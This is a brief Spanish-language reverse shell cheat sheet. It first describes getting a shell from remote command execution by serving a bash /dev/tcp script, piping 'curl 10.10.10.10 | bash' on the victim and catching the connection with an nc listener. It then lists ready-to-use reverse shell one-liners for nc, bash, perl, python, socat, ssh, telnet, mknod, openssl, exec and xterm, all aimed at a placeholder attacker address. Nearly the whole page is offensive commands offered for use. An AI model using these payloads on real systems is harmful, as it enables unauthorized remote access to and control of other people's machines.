Last updated on

Revershell cheet sheat


  • Paso 1: Tener ejecucion remota de comandos,

  • Paso 2: luego verificar si hay curl , lo haces con ” which curl”

  • Paso 3: luedo de la maquina atacante te abres un servidor http y creas un

  • index.html:

     #!/bin/bash
     bash -i >& /dev/tcp/10.10.10.10/443 0>&1
  • y te pones en escucha en la maquina atacante con:

     nc -nlvp 443
  • y ejecutas en la maquina victima lo siguiente

    curl 10.10.10.10 | bash
  • obtendras una revershell(realizar tratamiento de la consola):


MAS FORMAS


  • NC

     nc -e /bin/sh X.X.X.X 443
  • BASH

    bash -i >& /dev/tcp/X.X.X.X/443 0>&1
  • PERL

    perl -e 'use Socket;$i="X.X.X.X";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
  • PYTHON

     python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("X.X.X.X",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

  • SOCAT

     socat file:tty,raw,echo=0 tcp-connect:X.X.X.X:443
  • SSH

     ssh -R 443:localhost:443 user@X.X.X.X
  • TELNET

     telnet X.X.X.X 443
  • mknod BASH

     mknod backpipe p && nc X.X.X.X 443 0<backpipe | /bin/bash 1>backpipe
  • BASH /DEV/TCP

     /bin/bash -i > /dev/tcp/X.X.X.X/443 0<&1 2>&1
  • openssl

     openssl s_client -quiet -connect X.X.X.X:443
  • exec

     exec 5<>/dev/tcp/X.X.X.X/443
  • xterm

     xterm -display X.X.X.X:0